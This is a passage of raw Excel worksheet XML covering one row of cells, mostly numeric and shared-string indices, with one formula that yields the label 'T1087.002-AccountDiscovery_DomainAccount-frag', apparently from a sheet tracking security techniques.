      <c r="VN24" s="184"/>
      <c r="VO24" s="184"/>
      <c r="VP24" s="184"/>
      <c r="VQ24" s="184"/>
      <c r="VR24" s="184"/>
      <c r="VS24" s="184"/>
      <c r="VT24" s="184"/>
      <c r="VU24" s="184"/>
      <c r="VV24" s="184"/>
      <c r="VW24" s="184"/>
      <c r="VX24" s="184"/>
      <c r="VY24" s="184"/>
    </row>
    <row r="25" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A25" s="82" t="s">
        <v>17</v>
      </c>
      <c r="B25" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C25" s="83" t="s">
        <v>315</v>
      </c>
      <c r="D25" s="83" t="s">
        <v>52</v>
      </c>
      <c r="E25" s="83">
        <f t="shared" si="2"/>
        <v>19</v>
      </c>
      <c r="F25" s="83" t="s">
        <v>53</v>
      </c>
      <c r="G25" s="94" t="s">
        <v>969</v>
      </c>
      <c r="H25" s="83" t="s">
        <v>970</v>
      </c>
      <c r="I25" s="81" t="s">
        <v>971</v>
      </c>
      <c r="J25" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K25" s="81" t="s">
        <v>972</v>
      </c>
      <c r="L25" s="81" t="s">
        <v>973</v>
      </c>
      <c r="M25" s="378" t="s">
        <v>199</v>
      </c>
      <c r="N25" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O25" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P25" s="91"/>
      <c r="Q25" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R25" s="92" t="s">
        <v>974</v>
      </c>
      <c r="S25" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T25" s="92" t="s">
        <v>975</v>
      </c>
      <c r="U25" s="94" t="s">
        <v>976</v>
      </c>
      <c r="V25" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W25" s="96" t="s">
        <v>977</v>
      </c>
      <c r="X25" s="97" t="s">
        <v>978</v>
      </c>
      <c r="Y25" s="83" t="s">
        <v>979</v>
      </c>
      <c r="Z25" s="188" t="s">
        <v>980</v>
      </c>
      <c r="AA25" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB25" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC25" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD25" s="83"/>
      <c r="AE25" s="83"/>
      <c r="AF25" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG25" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH25" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI25" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ25" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AK25" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL25" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM25" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN25" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO25" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP25" s="385" t="str">
        <f>M25&amp;"-frag"</f>
        <v>T1087.002-AccountDiscovery_DomainAccount-frag</v>
      </c>
      <c r="AQ25" s="358">
        <v>2</v>
      </c>
      <c r="AR25" s="100"/>
      <c r="AS25" s="100">
        <v>1</v>
      </c>
      <c r="AT25" s="100">
        <v>1</v>
      </c>
      <c r="AU25" s="100">
        <v>2</v>
      </c>
      <c r="AV25" s="92" t="s">
        <v>946</v>
      </c>
      <c r="AW25" s="100">
        <v>2</v>
      </c>
      <c r="AX25" s="100">
        <v>2</v>
      </c>
      <c r="AY25" s="100">
        <v>1</v>
      </c>
      <c r="AZ25" s="100">
        <v>3</v>
      </c>
      <c r="BA25" s="381" t="s">
        <v>4877</v>
      </c>
      <c r="BB25" s="101">
        <v>24</v>
      </c>
      <c r="BC25" s="102" t="s">
        <v>2862</v>
      </c>
      <c r="BD25" s="102">
        <v>2</v>
      </c>
      <c r="BE25" s="103" t="s">
        <v>2863</v>
      </c>
      <c r="BF25" s="103">
        <v>2</v>
      </c>
      <c r="BG25" s="104">
        <v>1</v>
      </c>
      <c r="BH25" s="105">
        <v>11</v>
      </c>
      <c r="BI25" s="106" t="s">
        <v>2864</v>
      </c>
      <c r="BJ25" s="497">
        <v>4</v>
      </c>
      <c r="BK25" s="107" t="s">
        <v>2865</v>
      </c>
      <c r="BL25" s="107">
        <v>4</v>
      </c>
      <c r="BM25" s="108">
        <v>2</v>
      </c>
      <c r="BN25" s="109">
        <v>35</v>
      </c>
      <c r="BO25" s="110" t="s">
        <v>1996</v>
      </c>
      <c r="BP25" s="501">
        <v>6</v>
      </c>
      <c r="BQ25" s="111" t="s">
        <v>1997</v>
      </c>
      <c r="BR25" s="111">
        <v>6</v>
      </c>
      <c r="BS25" s="112">
        <v>2</v>
      </c>
      <c r="BT25" s="113">
        <v>42</v>
      </c>
      <c r="BU25" s="114" t="s">
        <v>2866</v>
      </c>
      <c r="BV25" s="503">
        <v>10</v>
      </c>
      <c r="BW25" s="115" t="s">
        <v>2867</v>
      </c>
      <c r="BX25" s="115">
        <v>9</v>
      </c>
      <c r="BY25" s="116">
        <v>2</v>
      </c>
      <c r="BZ25" s="250">
        <v>36</v>
      </c>
      <c r="CA25" s="251" t="s">
        <v>2868</v>
      </c>
      <c r="CB25" s="505">
        <v>13</v>
      </c>
      <c r="CC25" s="252" t="s">
        <v>2869</v>
      </c>
      <c r="CD25" s="252">
        <v>13</v>
      </c>
      <c r="CE25" s="253">
        <v>2</v>
      </c>
      <c r="CF25" s="101">
        <v>78</v>
      </c>
      <c r="CG25" s="102" t="s">
        <v>2084</v>
      </c>
      <c r="CH25" s="102">
        <v>23</v>
      </c>
      <c r="CI25" s="103" t="s">
        <v>2085</v>
      </c>
      <c r="CJ25" s="103">
        <v>22</v>
      </c>
      <c r="CK25" s="104">
        <v>2</v>
      </c>
      <c r="CL25" s="105">
        <v>0</v>
      </c>
      <c r="CM25" s="106">
        <v>0</v>
      </c>
      <c r="CN25" s="497">
        <v>0</v>
      </c>
      <c r="CO25" s="107">
        <v>0</v>
      </c>
      <c r="CP25" s="107">
        <v>0</v>
      </c>
      <c r="CQ25" s="108">
        <v>0</v>
      </c>
      <c r="CR25" s="109">
        <v>4</v>
      </c>
      <c r="CS25" s="110" t="s">
        <v>2870</v>
      </c>
      <c r="CT25" s="501">
        <v>3</v>
      </c>
      <c r="CU25" s="111" t="s">
        <v>2821</v>
      </c>
      <c r="CV25" s="111">
        <v>3</v>
      </c>
      <c r="CW25" s="112">
        <v>1</v>
      </c>
      <c r="CX25" s="113">
        <v>39</v>
      </c>
      <c r="CY25" s="114" t="s">
        <v>2141</v>
      </c>
      <c r="CZ25" s="503">
        <v>9</v>
      </c>
      <c r="DA25" s="115" t="s">
        <v>2142</v>
      </c>
      <c r="DB25" s="115">
        <v>9</v>
      </c>
      <c r="DC25" s="116">
        <v>2</v>
      </c>
      <c r="DD25" s="101">
        <v>0</v>
      </c>
      <c r="DE25" s="102">
        <v>0</v>
      </c>
      <c r="DF25" s="102">
        <v>0</v>
      </c>
      <c r="DG25" s="103">
        <v>0</v>
      </c>
      <c r="DH25" s="103">
        <v>0</v>
      </c>
      <c r="DI25" s="104">
        <v>0</v>
      </c>
      <c r="DJ25" s="105">
        <v>8</v>
      </c>
      <c r="DK25" s="106" t="s">
        <v>2871</v>
      </c>
      <c r="DL25" s="497">
        <v>2</v>
      </c>
      <c r="DM25" s="107" t="s">
        <v>2872</v>
      </c>
      <c r="DN25" s="107">
        <v>2</v>
      </c>
      <c r="DO25" s="108">
        <v>2</v>
      </c>
      <c r="DP25" s="109">
        <v>8</v>
      </c>
      <c r="DQ25" s="110" t="s">
        <v>2871</v>
      </c>
      <c r="DR25" s="501">
        <v>2</v>
      </c>
      <c r="DS25" s="111" t="s">
        <v>2872</v>
      </c>
      <c r="DT25" s="111">
        <v>2</v>
      </c>
      <c r="DU25" s="112">
        <v>2</v>
      </c>
      <c r="DV25" s="113">
        <v>17</v>
      </c>
      <c r="DW25" s="114" t="s">
        <v>2873</v>
      </c>
      <c r="DX25" s="503">
        <v>7</v>
      </c>
      <c r="DY25" s="115" t="s">
        <v>2874</v>
      </c>
      <c r="DZ25" s="115">
        <v>6</v>
      </c>
      <c r="EA25" s="116">
        <v>2</v>
      </c>
      <c r="EB25" s="250">
        <v>18</v>
      </c>
      <c r="EC25" s="251" t="s">
        <v>2875</v>
      </c>
      <c r="ED25" s="505">
        <v>5</v>
      </c>
      <c r="EE25" s="252" t="s">
        <v>2876</v>
      </c>
      <c r="EF25" s="252">
        <v>5</v>
      </c>
      <c r="EG25" s="253">
        <v>2</v>
      </c>
      <c r="EH25" s="101">
        <v>35</v>
      </c>
      <c r="EI25" s="102" t="s">
        <v>2877</v>
      </c>
      <c r="EJ25" s="102">
        <v>12</v>
      </c>
      <c r="EK25" s="103" t="s">
        <v>2878</v>
      </c>
      <c r="EL25" s="103">
        <v>11</v>
      </c>
      <c r="EM25" s="104">
        <v>2</v>
      </c>
      <c r="EN25" s="105">
        <v>0</v>
      </c>
      <c r="EO25" s="106">
        <v>0</v>
      </c>
      <c r="EP25" s="497">
        <v>0</v>
      </c>
      <c r="EQ25" s="107">
        <v>0</v>
      </c>
      <c r="ER25" s="107">
        <v>0</v>
      </c>
      <c r="ES25" s="108">
        <v>0</v>
      </c>
      <c r="ET25" s="109">
        <v>3</v>
      </c>
      <c r="EU25" s="110" t="s">
        <v>2879</v>
      </c>
      <c r="EV25" s="501">
        <v>2</v>
      </c>
      <c r="EW25" s="111" t="s">
        <v>2831</v>
      </c>
      <c r="EX25" s="111">
        <v>2</v>
      </c>
      <c r="EY25" s="112">
        <v>1</v>
      </c>
      <c r="EZ25" s="113">
        <v>11</v>
      </c>
      <c r="FA25" s="114" t="s">
        <v>2880</v>
      </c>
      <c r="FB25" s="503">
        <v>4</v>
      </c>
      <c r="FC25" s="115" t="s">
        <v>2881</v>
      </c>
      <c r="FD25" s="115">
        <v>4</v>
      </c>
      <c r="FE25" s="116">
        <v>2</v>
      </c>
      <c r="FF25" s="101">
        <v>24</v>
      </c>
      <c r="FG25" s="102" t="s">
        <v>2862</v>
      </c>
      <c r="FH25" s="102">
        <v>2</v>
      </c>
      <c r="FI25" s="103" t="s">
        <v>2863</v>
      </c>
      <c r="FJ25" s="103">
        <v>2</v>
      </c>
      <c r="FK25" s="104">
        <v>1</v>
      </c>
      <c r="FL25" s="105">
        <v>2</v>
      </c>
      <c r="FM25" s="106" t="s">
        <v>2882</v>
      </c>
      <c r="FN25" s="497">
        <v>1</v>
      </c>
      <c r="FO25" s="107" t="s">
        <v>2883</v>
      </c>
      <c r="FP25" s="107">
        <v>1</v>
      </c>
      <c r="FQ25" s="108">
        <v>1</v>
      </c>
      <c r="FR25" s="109">
        <v>26</v>
      </c>
      <c r="FS25" s="110" t="s">
        <v>2884</v>
      </c>
      <c r="FT25" s="501">
        <v>3</v>
      </c>
      <c r="FU25" s="111" t="s">
        <v>2885</v>
      </c>
      <c r="FV25" s="111">
        <v>3</v>
      </c>
      <c r="FW25" s="112">
        <v>1</v>
      </c>
      <c r="FX25" s="113">
        <v>25</v>
      </c>
      <c r="FY25" s="114" t="s">
        <v>2886</v>
      </c>
      <c r="FZ25" s="503">
        <v>3</v>
      </c>
      <c r="GA25" s="115" t="s">
        <v>2887</v>
      </c>
      <c r="GB25" s="115">
        <v>3</v>
      </c>
      <c r="GC25" s="116">
        <v>1</v>
      </c>
      <c r="GD25" s="250">
        <v>9</v>
      </c>
      <c r="GE25" s="251" t="s">
        <v>2888</v>
      </c>
      <c r="GF25" s="505">
        <v>5</v>
      </c>
      <c r="GG25" s="252" t="s">
        <v>2889</v>
      </c>
      <c r="GH25" s="252">
        <v>5</v>
      </c>
      <c r="GI25" s="253">
        <v>1</v>
      </c>
      <c r="GJ25" s="101">
        <v>34</v>
      </c>
      <c r="GK25" s="102" t="s">
        <v>2890</v>
      </c>
      <c r="GL25" s="102">
        <v>8</v>
      </c>
      <c r="GM25" s="103" t="s">
        <v>2891</v>
      </c>
      <c r="GN25" s="103">
        <v>8</v>
      </c>
      <c r="GO25" s="104">
        <v>1</v>
      </c>
      <c r="GP25" s="105">
        <v>0</v>
      </c>
      <c r="GQ25" s="106">
        <v>0</v>
      </c>
      <c r="GR25" s="497">
        <v>0</v>
      </c>
      <c r="GS25" s="107">
        <v>0</v>
      </c>
      <c r="GT25" s="107">
        <v>0</v>
      </c>
      <c r="GU25" s="108">
        <v>0</v>
      </c>
      <c r="GV25" s="109">
        <v>1</v>
      </c>
      <c r="GW25" s="110" t="s">
        <v>1960</v>
      </c>
      <c r="GX25" s="501">
        <v>1</v>
      </c>
      <c r="GY25" s="111" t="s">
        <v>1961</v>
      </c>
      <c r="GZ25" s="111">
        <v>1</v>
      </c>
      <c r="HA25" s="112">
        <v>1</v>
      </c>
      <c r="HB25" s="113">
        <v>27</v>
      </c>
      <c r="HC25" s="114" t="s">
        <v>2892</v>
      </c>
      <c r="HD25" s="503">
        <v>4</v>
      </c>
      <c r="HE25" s="115" t="s">
        <v>2893</v>
      </c>
      <c r="HF25" s="115">
        <v>4</v>
      </c>
      <c r="HG25" s="116">
        <v>1</v>
      </c>
      <c r="HH25" s="101">
        <v>0</v>
      </c>
      <c r="HI25" s="102">
        <v>0</v>
      </c>
      <c r="HJ25" s="102">
        <v>0</v>
      </c>
      <c r="HK25" s="103">
        <v>0</v>
      </c>
      <c r="HL25" s="103">
        <v>0</v>
      </c>
      <c r="HM25" s="104">
        <v>0</v>
      </c>
      <c r="HN25" s="105">
        <v>1</v>
      </c>
      <c r="HO25" s="106" t="s">
        <v>2894</v>
      </c>
      <c r="HP25" s="497">
        <v>1</v>
      </c>
      <c r="HQ25" s="107" t="s">
        <v>2895</v>
      </c>
      <c r="HR25" s="107">
        <v>1</v>
      </c>
      <c r="HS25" s="108">
        <v>1</v>
      </c>
      <c r="HT25" s="109">
        <v>1</v>
      </c>
      <c r="HU25" s="110" t="s">
        <v>2894</v>
      </c>
      <c r="HV25" s="501">
        <v>1</v>
      </c>
      <c r="HW25" s="111" t="s">
        <v>2895</v>
      </c>
      <c r="HX25" s="111">
        <v>1</v>
      </c>
      <c r="HY25" s="112">
        <v>1</v>
      </c>
      <c r="HZ25" s="113">
        <v>0</v>
      </c>
      <c r="IA25" s="114">
        <v>0</v>
      </c>
      <c r="IB25" s="503">
        <v>0</v>
      </c>
      <c r="IC25" s="115">
        <v>0</v>
      </c>
      <c r="ID25" s="115">
        <v>0</v>
      </c>
      <c r="IE25" s="116">
        <v>0</v>
      </c>
      <c r="IF25" s="250">
        <v>9</v>
      </c>
      <c r="IG25" s="251" t="s">
        <v>2896</v>
      </c>
      <c r="IH25" s="505">
        <v>3</v>
      </c>
      <c r="II25" s="252" t="s">
        <v>2897</v>
      </c>
      <c r="IJ25" s="252">
        <v>3</v>
      </c>
      <c r="IK25" s="253">
        <v>2</v>
      </c>
      <c r="IL25" s="101">
        <v>9</v>
      </c>
      <c r="IM25" s="102" t="s">
        <v>2896</v>
      </c>
      <c r="IN25" s="102">
        <v>3</v>
      </c>
      <c r="IO25" s="103" t="s">
        <v>2897</v>
      </c>
      <c r="IP25" s="103">
        <v>3</v>
      </c>
      <c r="IQ25" s="104">
        <v>2</v>
      </c>
      <c r="IR25" s="105">
        <v>0</v>
      </c>
      <c r="IS25" s="106">
        <v>0</v>
      </c>
      <c r="IT25" s="497">
        <v>0</v>
      </c>
      <c r="IU25" s="107">
        <v>0</v>
      </c>
      <c r="IV25" s="107">
        <v>0</v>
      </c>
      <c r="IW25" s="108">
        <v>0</v>
      </c>
      <c r="IX25" s="109">
        <v>0</v>
      </c>
      <c r="IY25" s="110">
        <v>0</v>
      </c>
      <c r="IZ25" s="501">
        <v>0</v>
      </c>
      <c r="JA25" s="111">
        <v>0</v>
      </c>
      <c r="JB25" s="111">
        <v>0</v>
      </c>
      <c r="JC25" s="112">
        <v>0</v>
      </c>
      <c r="JD25" s="113">
        <v>1</v>
      </c>
      <c r="JE25" s="114" t="s">
        <v>2894</v>
      </c>
      <c r="JF25" s="503">
        <v>1</v>
      </c>
      <c r="JG25" s="115" t="s">
        <v>2895</v>
      </c>
      <c r="JH25" s="115">
        <v>1</v>
      </c>
      <c r="JI25" s="116">
        <v>1</v>
      </c>
      <c r="JJ25" s="101">
        <v>0</v>
      </c>
      <c r="JK25" s="102">
        <v>0</v>
      </c>
      <c r="JL25" s="102">
        <v>0</v>
      </c>
      <c r="JM25" s="103">
        <v>0</v>
      </c>
      <c r="JN25" s="103">
        <v>0</v>
      </c>
      <c r="JO25" s="104">
        <v>0</v>
      </c>
      <c r="JP25" s="105">
        <v>0</v>
      </c>
      <c r="JQ25" s="106">
        <v>0</v>
      </c>
      <c r="JR25" s="497">
        <v>0</v>
      </c>
      <c r="JS25" s="107">
        <v>0</v>
      </c>
      <c r="JT25" s="107">
        <v>0</v>
      </c>
      <c r="JU25" s="108">
        <v>0</v>
      </c>
      <c r="JV25" s="109">
        <v>0</v>
      </c>
      <c r="JW25" s="110">
        <v>0</v>
      </c>
      <c r="JX25" s="501">
        <v>0</v>
      </c>
      <c r="JY25" s="111">
        <v>0</v>
      </c>
      <c r="JZ25" s="111">
        <v>0</v>
      </c>
      <c r="KA25" s="112">
        <v>0</v>
      </c>
      <c r="KB25" s="113">
        <v>0</v>
      </c>
      <c r="KC25" s="114">
        <v>0</v>
      </c>
      <c r="KD25" s="503">
        <v>0</v>
      </c>
      <c r="KE25" s="115">
        <v>0</v>
      </c>
      <c r="KF25" s="115">
        <v>0</v>
      </c>
      <c r="KG25" s="116">
        <v>0</v>
      </c>
      <c r="KH25" s="250">
        <v>0</v>
      </c>
      <c r="KI25" s="251">
        <v>0</v>
      </c>
      <c r="KJ25" s="505">
        <v>0</v>
      </c>
      <c r="KK25" s="252">
        <v>0</v>
      </c>
      <c r="KL25" s="252">
        <v>0</v>
      </c>
      <c r="KM25" s="253">
        <v>0</v>
      </c>
      <c r="KN25" s="101">
        <v>0</v>
      </c>
      <c r="KO25" s="102">
        <v>0</v>
      </c>
      <c r="KP25" s="102">
        <v>0</v>
      </c>
      <c r="KQ25" s="103">
        <v>0</v>
      </c>
      <c r="KR25" s="103">
        <v>0</v>
      </c>
      <c r="KS25" s="104">
        <v>0</v>
      </c>
      <c r="KT25" s="105">
        <v>0</v>
      </c>
      <c r="KU25" s="106">
        <v>0</v>
      </c>
      <c r="KV25" s="497">
        <v>0</v>
      </c>
      <c r="KW25" s="107">
        <v>0</v>
      </c>
      <c r="KX25" s="107">
        <v>0</v>
      </c>
      <c r="KY25" s="108">
        <v>0</v>
      </c>
      <c r="KZ25" s="109">
        <v>0</v>
      </c>
      <c r="LA25" s="110">
        <v>0</v>
      </c>
      <c r="LB25" s="501">
        <v>0</v>
      </c>
      <c r="LC25" s="111">
        <v>0</v>
      </c>
      <c r="LD25" s="111">
        <v>0</v>
      </c>
      <c r="LE25" s="112">
        <v>0</v>
      </c>
      <c r="LF25" s="113">
        <v>0</v>
      </c>
      <c r="LG25" s="114">
        <v>0</v>
      </c>
      <c r="LH25" s="503">
        <v>0</v>
      </c>
      <c r="LI25" s="115">
        <v>0</v>
      </c>
      <c r="LJ25" s="115">
        <v>0</v>
      </c>
      <c r="LK25" s="116">
        <v>0</v>
      </c>
      <c r="LL25" s="117">
        <v>4</v>
      </c>
      <c r="LM25" s="507">
        <v>4</v>
      </c>
      <c r="LN25" s="119">
        <v>2</v>
      </c>
      <c r="LO25" s="119">
        <v>0</v>
      </c>
      <c r="LP25" s="119">
        <v>3</v>
      </c>
      <c r="LQ25" s="119">
        <v>2</v>
      </c>
      <c r="LR25" s="119">
        <v>0</v>
      </c>
      <c r="LS25" s="119">
        <v>2</v>
      </c>
      <c r="LT25" s="382"/>
      <c r="LU25" s="117">
        <v>2</v>
      </c>
      <c r="LV25" s="118" t="s">
        <v>4153</v>
      </c>
      <c r="LW25" s="507">
        <v>2</v>
      </c>
      <c r="LX25" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY25" s="119">
        <v>1</v>
      </c>
      <c r="LZ25" s="119">
        <v>2</v>
      </c>
      <c r="MA25" s="117">
        <v>0</v>
      </c>
      <c r="MB25" s="118">
        <v>0</v>
      </c>
      <c r="MC25" s="507">
        <v>0</v>
      </c>
      <c r="MD25" s="119">
        <v>0</v>
      </c>
      <c r="ME25" s="119">
        <v>0</v>
      </c>
      <c r="MF25" s="119">
        <v>0</v>
      </c>
      <c r="MG25" s="117">
        <v>0</v>
      </c>
      <c r="MH25" s="118">
        <v>0</v>
      </c>
      <c r="MI25" s="507">
        <v>0</v>
      </c>
      <c r="MJ25" s="119">
        <v>0</v>
      </c>
      <c r="MK25" s="119">
        <v>0</v>
      </c>
      <c r="ML25" s="119">
        <v>0</v>
      </c>
      <c r="MM25" s="117">
        <v>0</v>
      </c>
      <c r="MN25" s="118">
        <v>0</v>
      </c>
      <c r="MO25" s="507">
        <v>0</v>
      </c>
      <c r="MP25" s="119">
        <v>0</v>
      </c>
      <c r="MQ25" s="119">
        <v>0</v>
      </c>
      <c r="MR25" s="119">
        <v>0</v>
      </c>
      <c r="MS25" s="117">
        <v>2</v>
      </c>
      <c r="MT25" s="118" t="s">
        <v>4181</v>
      </c>
      <c r="MU25" s="507">
        <v>2</v>
      </c>
      <c r="MV25" s="119" t="s">
        <v>2789</v>
      </c>
      <c r="MW25" s="119">
        <v>1</v>
      </c>
      <c r="MX25" s="119">
        <v>2</v>
      </c>
      <c r="MY25" s="117">
        <v>0</v>
      </c>
      <c r="MZ25" s="118">
        <v>0</v>
      </c>
      <c r="NA25" s="507">
        <v>0</v>
      </c>
      <c r="NB25" s="119">
        <v>0</v>
      </c>
      <c r="NC25" s="119">
        <v>0</v>
      </c>
      <c r="ND25" s="119">
        <v>0</v>
      </c>
      <c r="NE25" s="117">
        <v>0</v>
      </c>
      <c r="NF25" s="118">
        <v>0</v>
      </c>
      <c r="NG25" s="507">
        <v>0</v>
      </c>
      <c r="NH25" s="119">
        <v>0</v>
      </c>
      <c r="NI25" s="119">
        <v>0</v>
      </c>
      <c r="NJ25" s="119">
        <v>0</v>
      </c>
      <c r="NK25" s="117">
        <v>0</v>
      </c>
      <c r="NL25" s="118">
        <v>0</v>
      </c>
      <c r="NM25" s="507">
        <v>0</v>
      </c>
      <c r="NN25" s="119">
        <v>0</v>
      </c>
      <c r="NO25" s="119">
        <v>0</v>
      </c>
      <c r="NP25" s="119">
        <v>0</v>
      </c>
      <c r="NQ25" s="117">
        <v>0</v>
      </c>
      <c r="NR25" s="118">
        <v>0</v>
      </c>
      <c r="NS25" s="507">
        <v>0</v>
      </c>
      <c r="NT25" s="119">
        <v>0</v>
      </c>
      <c r="NU25" s="119">
        <v>0</v>
      </c>
      <c r="NV25" s="119">
        <v>0</v>
      </c>
      <c r="NW25" s="117">
        <v>0</v>
      </c>
      <c r="NX25" s="118">
        <v>0</v>
      </c>
      <c r="NY25" s="507">
        <v>0</v>
      </c>
      <c r="NZ25" s="119">
        <v>0</v>
      </c>
      <c r="OA25" s="119">
        <v>0</v>
      </c>
      <c r="OB25" s="119">
        <v>0</v>
      </c>
      <c r="OC25" s="120">
        <v>0</v>
      </c>
      <c r="OD25" s="120">
        <v>0</v>
      </c>
      <c r="OE25" s="120">
        <v>0</v>
      </c>
      <c r="OF25" s="121">
        <v>0</v>
      </c>
      <c r="OG25" s="120">
        <v>0</v>
      </c>
      <c r="OH25" s="120">
        <v>0</v>
      </c>
      <c r="OI25" s="120">
        <v>0</v>
      </c>
      <c r="OJ25" s="120">
        <v>0</v>
      </c>
      <c r="OK25" s="383"/>
      <c r="OL25" s="120">
        <v>0</v>
      </c>
      <c r="OM25" s="120">
        <v>0</v>
      </c>
      <c r="ON25" s="120">
        <v>0</v>
      </c>
      <c r="OO25" s="193"/>
      <c r="OP25" s="193">
        <v>0</v>
      </c>
      <c r="OQ25" s="464">
        <v>0</v>
      </c>
      <c r="OR25" s="120">
        <v>0</v>
      </c>
      <c r="OS25" s="120">
        <v>0</v>
      </c>
      <c r="OT25" s="120">
        <v>0</v>
      </c>
      <c r="OU25" s="193"/>
      <c r="OV25" s="193">
        <v>0</v>
      </c>
      <c r="OW25" s="464">
        <v>0</v>
      </c>
      <c r="OX25" s="120">
        <v>0</v>
      </c>
      <c r="OY25" s="120">
        <v>0</v>
      </c>
      <c r="OZ25" s="120">
        <v>0</v>
      </c>
      <c r="PA25" s="193"/>
      <c r="PB25" s="193">
        <v>0</v>
      </c>
      <c r="PC25" s="464">
        <v>0</v>
      </c>
      <c r="PD25" s="120">
        <v>0</v>
      </c>
      <c r="PE25" s="120">
        <v>0</v>
      </c>
      <c r="PF25" s="120">
        <v>0</v>
      </c>
      <c r="PG25" s="193"/>
      <c r="PH25" s="193">
        <v>0</v>
      </c>
      <c r="PI25" s="464">
        <v>0</v>
      </c>
      <c r="PJ25" s="120">
        <v>0</v>
      </c>
      <c r="PK25" s="120">
        <v>0</v>
      </c>
      <c r="PL25" s="120">
        <v>0</v>
      </c>
      <c r="PM25" s="193"/>
      <c r="PN25" s="193">
        <v>0</v>
      </c>
      <c r="PO25" s="464">
        <v>0</v>
      </c>
      <c r="PP25" s="120">
        <v>0</v>
      </c>
      <c r="PQ25" s="120">
        <v>0</v>
      </c>
      <c r="PR25" s="120">
        <v>0</v>
      </c>
      <c r="PS25" s="193"/>
      <c r="PT25" s="193">
        <v>0</v>
      </c>
      <c r="PU25" s="464">
        <v>0</v>
      </c>
      <c r="PV25" s="120">
        <v>0</v>
      </c>
      <c r="PW25" s="120">
        <v>0</v>
      </c>
      <c r="PX25" s="120">
        <v>0</v>
      </c>
      <c r="PY25" s="193"/>
      <c r="PZ25" s="193">
        <v>0</v>
      </c>
      <c r="QA25" s="464">
        <v>0</v>
      </c>
      <c r="QB25" s="120">
        <v>0</v>
      </c>
      <c r="QC25" s="120">
        <v>0</v>
      </c>
      <c r="QD25" s="120">
        <v>0</v>
      </c>
      <c r="QE25" s="193"/>
      <c r="QF25" s="193">
        <v>0</v>
      </c>
      <c r="QG25" s="464">
        <v>0</v>
      </c>
      <c r="QH25" s="120">
        <v>0</v>
      </c>
      <c r="QI25" s="120">
        <v>0</v>
      </c>
      <c r="QJ25" s="120">
        <v>0</v>
      </c>
      <c r="QK25" s="193"/>
      <c r="QL25" s="193">
        <v>0</v>
      </c>
      <c r="QM25" s="464">
        <v>0</v>
      </c>
      <c r="QN25" s="120">
        <v>0</v>
      </c>
      <c r="QO25" s="120">
        <v>0</v>
      </c>
      <c r="QP25" s="120">
        <v>0</v>
      </c>
      <c r="QQ25" s="193"/>
      <c r="QR25" s="193">
        <v>0</v>
      </c>
      <c r="QS25" s="464">
        <v>0</v>
      </c>
      <c r="QT25" s="184"/>
      <c r="QU25" s="184"/>
      <c r="QV25" s="184"/>
      <c r="QW25" s="184"/>
      <c r="QX25" s="184"/>
      <c r="QY25" s="184"/>
      <c r="QZ25" s="184"/>
      <c r="RA25" s="184"/>
      <c r="RB25" s="184"/>
      <c r="RC25" s="184"/>
      <c r="RD25" s="184"/>
      <c r="RE25" s="184"/>
      <c r="RF25" s="184"/>
      <c r="RG25" s="184"/>
      <c r="RH25" s="184"/>
      <c r="RI25" s="184"/>
      <c r="RJ25" s="184"/>
      <c r="RK25" s="184"/>
      <c r="RL25" s="184"/>
      <c r="RM25" s="184"/>
      <c r="RN25" s="184"/>
      <c r="RO25" s="184"/>
      <c r="RP25" s="184"/>
      <c r="RQ25" s="184"/>
      <c r="RR25" s="184"/>
      <c r="RS25" s="184"/>
      <c r="RT25" s="184"/>
      <c r="RU25" s="184"/>
      <c r="RV25" s="184"/>
      <c r="RW25" s="184"/>
      <c r="RX25" s="184"/>
      <c r="RY25" s="184"/>
      <c r="RZ25" s="184"/>
      <c r="SA25" s="184"/>
      <c r="SB25" s="184"/>
      <c r="SC25" s="184"/>
      <c r="SD25" s="184"/>
      <c r="SE25" s="184"/>
      <c r="SF25" s="184"/>
      <c r="SG25" s="184"/>
      <c r="SH25" s="184"/>
      <c r="SI25" s="184"/>
      <c r="SJ25" s="184"/>
      <c r="SK25" s="184"/>
      <c r="SL25" s="184"/>
      <c r="SM25" s="184"/>
      <c r="SN25" s="184"/>
      <c r="SO25" s="184"/>
      <c r="SP25" s="184"/>
      <c r="SQ25" s="184"/>
      <c r="SR25" s="184"/>
      <c r="SS25" s="184"/>
      <c r="ST25" s="184"/>
      <c r="SU25" s="184"/>
      <c r="SV25" s="184"/>
      <c r="SW25" s="184"/>
      <c r="SX25" s="184"/>
      <c r="SY25" s="184"/>
      <c r="SZ25" s="184"/>
      <c r="TA25" s="184"/>
      <c r="TB25" s="184"/>
      <c r="TC25" s="184"/>
      <c r="TD25" s="184"/>
      <c r="TE25" s="184"/>
      <c r="TF25" s="184"/>
      <c r="TG25" s="184"/>
      <c r="TH25" s="184"/>
      <c r="TI25" s="184"/>
      <c r="TJ25" s="184"/>
      <c r="TK25" s="184"/>
      <c r="TL25" s="184"/>
      <c r="TM25" s="184"/>
      <c r="TN25" s="184"/>
      <c r="TO25" s="184"/>
      <c r="TP25" s="184"/>
      <c r="TQ25" s="184"/>
      <c r="TR25" s="184"/>
      <c r="TS25" s="184"/>
      <c r="TT25" s="184"/>
      <c r="TU25" s="184"/>
      <c r="TV25" s="184"/>
      <c r="TW25" s="184"/>
      <c r="TX25" s="184"/>
      <c r="TY25" s="184"/>
      <c r="TZ25" s="184"/>
      <c r="UA25" s="184"/>
      <c r="UB25" s="184"/>
      <c r="UC25" s="184"/>
      <c r="UD25" s="184"/>
      <c r="UE25" s="184"/>
      <c r="UF25" s="184"/>
